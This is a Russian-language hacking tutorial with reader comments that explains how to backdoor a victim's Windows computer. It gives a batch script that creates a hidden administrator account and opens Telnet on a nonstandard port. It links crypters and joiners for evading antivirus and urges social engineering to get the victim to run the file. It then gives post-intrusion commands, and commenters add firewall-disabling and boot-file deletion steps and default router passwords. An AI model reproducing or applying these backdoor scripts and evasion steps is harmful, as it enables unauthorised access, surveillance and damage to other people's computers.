Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.
Телнет — сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается «ручками», мыши отдыхают, только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.
Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у
жертвы. Бывает такое, что этот сервис уже будет весить у «врага», но при попытки
подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,
но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким
методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.
Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот
метод в данном случае наиболее актуален.
Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый
тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе
порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной
строки).
тело батника:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
все это пишешь в блокноте, и сохраняем как *.bat
Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del — удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add — не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«hacker»=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=
auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM, редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet
окончательно запустит наш бэкдор.
теперь проверим правильный ли синтаксис кода. Открываем командную строку, если
она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:
Пуск -> Выполнить -> пишем services.msc -> Ok
Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.
Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает
консольное черное окно, говорящее о выполняемых процессах в командной строке. Но
не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler
ifolder.ru/7197807. Она
компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник
превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.
Вроде готово… Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут
ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь
ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб). Они помогут тебе склеить файлы в один и изменить
сигнатуру дабы не палится антивирусами.
Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы
тебе осталось только подключится к телнету через указанный тобой порт. Бывает
так что жертва находится в глобальной сети www у которой IP динамический, в этом
случаи, зная диапазон IP его провайдера можно просканировать эту сеть на
открытый наш редко используемый 972 Порт. А чтобы знать когда твой «друг»
в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.
Осталось подключится. Для этого можешь выбрать стандартный виндосовский
клиент который находится тут c:WINDOWSsystem32telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>_
Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:
C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul
перезагрузить комп:
C:>shutdown -r -t 1 -c -f
прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f — который запретит доступ к нему
или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)
Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.
P.S. На все непонятные термины и выражения есть Гугл.
Внимание!!! Данная статья — это не побуждение к действию, все описанное здесь
попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей
информационной безопасности
155 комментариев
Ибо после статьи телнет---это ДЕЛО=)))
В ЛС плиз
password : (hack) клава или что то еще отказывается работать и что либо печатать , если кто знает в чем проблема пожалуйста отпишитесь тут или на мыло [email protected] заранее блогадарен . Автору RESPECT!
MyXa_CbIkaTyXa - сложно вам так сказать что и чего... Мало инфы ) выб в личку или на форуме отписались бы )
GivioN - Респект... +1 )
1) ошибочное написание тела батника. Проверь ещё раз его.
2) возможно этот порт уже занят другим приложением, и телнет не может его сбросить.
3) есть версия что у жертвы стоит фаервол который не даёт батнику повесить телнет на этот порт. Поэтому в этом случае можешь попробовать прописать в батнике часто используемые порты:21, 25, 110,80(при 80 возможно запретишь выход жертвы в инет) т.к. в фаерволе по дефолту на них исключение.
А узнать какие порты открыты у жертвы тебе помогут известные сканеры сети и безопамности, такие как XSpider или Essential NetTools(ИМХО - лучшие)))
P.S Как я понял, я многое упустил в этой статье...Наверно))
to Givion:Что-то не работает команда "tlntadmn config port=972
sec=-NTLM". Может что б к жертве подключиться надо включит функцию Телнет у себя? Если да то как?
chcp 1251
net user SUPPORT_388945a0 /delete
net user support tebehana /add
net localgroup Администраторы support /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0
y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
net stop sharedaccess
sc config sharedaccess start= disabled
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
NTCurrentVersion - у меня название другое : CurrentVersion, а винлогон и подавно нету....это может помешать или все делать так как написано?
Короче для того чтобы скрыть профиль нужно ввести нижеприведенный текст...это дла ХР...для других операционнок возможно будет немного подругому
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
"hacker"=dword:00000000
там где написано Windows NT нужен пробел)
вот как правильно
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
"hacker"=dword:00000000
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
нужно вставлять в бат файл или создавать отдельно регом??? если регом то как?
Отказано в доступе
что делать подскажите?
1- как убрать админа HAcker
2- ну получается подключится к жертве пишет "Не удалось открыть подключение к этому узлу, на порт 972: Сбой подключения "
Помогите плиз
я пробовал скрипт, но в велкоме запись не исчезала(
напишите пожалуста скрипт полностью, или скажате чё делать
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
"hacker"=dword:00000000
и не забудьте что, то что выделено в [ ] надо чтобы было в одной строчке
А почему тут вирус?
Все что создал человек можно взломать --- идеальной защиты не существует.
вместо строки regedit /s conf.reg
пропишите reg add "hklmsoftwaremicrosoftwindows NTcurrentversionwinlogonspecialaccountsuserlist" /v tentek /t REG_DWORD /d 0 и все готово.
жертва даже не узнает о существовании учетки!
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v hacker /t REG_DWORD /d 0
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
....reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v hacker /t REG_DWORD /d 0
reg add "HKEY_LOCAL_MACHINE*SOFTWARE*Microsoft*Windows NT*CurrentVersion*Winlogon*SpecialAccounts*UserList" /v hacker /t REG_DWORD /d 0
место звездочек поставте палочки и всё получится ))
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]по конкретней можно >о что значит? как именно писать через пробел IP и порт??? Вставляем код,Какой именно код подскажите плзззззз!
395-526-899
"... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб) . ..."
стучите в асю:
381225061
"...Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000..."
помогиите, ася 381225061
между ip и портом нужен пробел
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
запустил батник на своем компе , появилась учетка , я её удалил))), надеюсь мой камп теперь не доступен через телнет?(((
пиши в ЛС
З.Ы. Подключался на адсл-модем, по дефолту там стоит
login: root
password: Admin
так что пробуйте
всё сдела на отлично но при подклбчении порт говрит плохой!!!!
когда вбиваю команду >ftp open "тут свой ip" выдает такую строку
ftp> connect :Неизвестный код ошибки
И еще такая проблема когда я проверяю свой ип через командную строку "ipconfig/all у меня такой ип 192.168.1.4 ,
а через любой сайт проверки айпишника выдает 92.127.11.9
первый ип 192.168.1.4 я так понял это ип модема?
вобщем когда пытаюсь подканектится по ftp через телнет пробую вбивать и первый ип и второй и вобоих случаях выдаед ошибку! может дело в модеме или настройках винды либо это вобще провайдер глючный? подскажите кто знает
@echo off
Проверил у себя ком строка появляется на доли секунды и исчезает, не шаришь не поймешь!
И АВП побоку, и юзер доволен, и я в его компе как дома :)))
администрирования, только чтобы жертва невидела у себя на компе радмина...(объяснтие детально, я новичёк...)
Нужен хэлп.!! помогите получить рут на серванте (скан показал 21(ftp),23(telnet),80(www-http),8080(http-proxy фаервол )) ... пробовал телнетиться - Welcome Dreambox - kernel2.6.9 по сути *nix, просит login(я пробовал брутусAet2 - не получается) и pass (точно рут).... пробовал потушить сервант ServerKiller-ом(byLogger) по 80,8080,21,23 портам -- !! получилось вывести из строя на две минуты.... а теперь атаки ServerKiller(byLogger) нифига не дают
Microsoft Telnet> o 192.168.1.24[ IP ЖЕРТВЫ? ] 972[порт]
Как удалить какие либо папки с С диска,чтоб с батника одной командой удалял, без вот этого: c:WINDOWS*, Продолжить [Y(да)/N(нет)]? ЧТОБ БЕЗ ЭТОГО УДАЛИЛА
С какой винды лучше взламывать???
Существует команда, толи прога в виде консоли. Её действие заключается в следующим: Вообщем стандартное соединение проходит обменом 16 пакетов с серваком, а вот если мы отправим на этот сервак 1000 пакетов он пависнит на 100% повиснит, И вот тогда можно зайти на сервак с 23 "стандартного" порта!!! Так вот эта команда, толи прога в виде консоли, такое мутит. Кто знает об этом добавьте высказывание...
*================================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================================
C: и вот тут я незнаю как BOOT.INI удалить!!!
ПОЖАЛУЙСТА, КОМУ НЕ ЛЕНЬ ПОМОГИТЕ, ПРОПИШИТЕ...
Вот таким образом:
bootcfg /delete /id 1 >nul
ЛОгин вводится, а при наборе пароля ввод не идёт !!!
Кто знает, в чём дело ? Оп. система- Windows XP
А есть программа, чтобы защититься от этого? Подозреваю, что со мной так и обстоит. Я совершеннейший чайник, не могу избавиться от лазутчика, который ставит мне программы, заделался параллельно админом, вытворяет, что пожелает...даже внедрил программу ДОС.....Можно ли по его следам , обнаруженным у меня пойти по его следу и внедриться к нему?
Но есть вопрос: где взять боьше команд для telneta именно по управлению компом??
1) как сделать, чтобы батник не показывал окно?
2) что делать, если пароль не вводится? вот тупо кнопку давишь, а он не вписывается (telnet.exe менял а толку нет)
тотал!!!чтоб не попал в базу антивирусов!!!
http://lokalhost1.webservis.ru/ALB.zip
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
..........................................................................
2 - учетной записи SUPPORT_388945a0 в ХР не существует, да и не зачем её удалять.
3 - нельзя добавится в группу админов так как кодировка не подходит.
4 - нельзя удалить встроенную учетку Пользователей.
5 - regedit вызывает редактор реестра, а при слиянии с conf.reg обязательно выскочит окно на подтверждение.
6 - проще на этом месте прописать reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v hacker /t REG_DWORD /d 0x00000000 /f
и это сработает.
7 - нельзя запустить телнет командой net start telnet если он отключен в службах.